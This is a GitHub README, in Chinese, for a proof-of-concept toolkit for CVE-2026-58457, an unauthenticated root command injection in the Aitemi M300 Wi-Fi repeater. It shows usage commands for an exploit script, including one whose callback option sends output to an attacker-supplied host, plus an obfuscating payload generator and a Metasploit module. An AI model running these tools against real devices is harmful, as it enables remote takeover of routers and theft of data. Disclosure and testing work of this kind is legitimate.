J4ck3LSyN-Gen2/CVE-2026-58457

GitHub: J4ck3LSyN-Gen2/CVE-2026-58457

针对深圳爱特米 M300 Wi-Fi 中继器未授权 OS 命令注入漏洞的完整概念验证工具集,含验证器、exploit、payload 生成器和 Metasploit 模块。

Stars: 1 | Forks: 0

# CVE-2026-58457 - 深圳爱特米 M300 Wi-Fi 中继器中的未授权 OS 命令注入 ## 漏洞概述 `smacfilter_conf` handler 中存在一个**未授权**的 OS 命令注入漏洞。`name`、`enable` 和 `mac` GET 参数在未经过滤的情况下被传入 `sprintf()` 调用,该调用构建的 UCI 命令会以 **root** 权限执行。 - **严重程度**:严重 (CVSS 9.8) - **影响**:无需身份验证即可实现远程 root 命令执行 ## 包含的工具 - **`poc.py`** - 具备完整功能的 exploit,支持 HTTPS、重试、超时以及 callback 数据外发。 - **`val.py`** - 安全、被动的漏洞验证器(使用无害的 `id` 命令)。 - **`gen.py`** - 高级 payload 生成器,支持多种混淆技术。 - **`MITIGATIONS.md`** - 推荐的防御措施。 - **Metasploit 模块** - 位于 `exploit/` 目录中。 ## 安装说明 ``` pip install requests ``` ## 快速使用 1. **验证(安全)** ``` python3 val.py --target 192.168.1.100 ``` 2. **Exploit(仅限授权测试)** ``` python3 poc.py --target 192.168.1.100 --cmd "id" python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/ ``` 3. **生成混淆 Payload** ``` python3 gen.py -c "id" -n 10 ``` ## Metasploit 1. **移动模块** ``` cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/ # 或者主要的 MSF 路径:/usr/share/metasploit-framework/modules/exploits/linux/http/ ``` 2. **重新加载所有模块** ``` msfconsole -q -x "reload_all" ``` ## 参考 - _CVE-2026-58457_ - [VulnCheck 公告](https://www.vulncheck.com/advisories/shenzhen-aitemi-m300-mt02-unauthenticated-os-command-injection-via-protocol-csp) - [GitHub 披露](https://github.com/IEATASICS/m300-repeater-bugs) **欢迎 Star 和贡献** - 特别是针对 bypass 的改进或对其他固件变体的支持。
标签:Go语言工具, Python, XXE攻击, 无后门, 逆向工具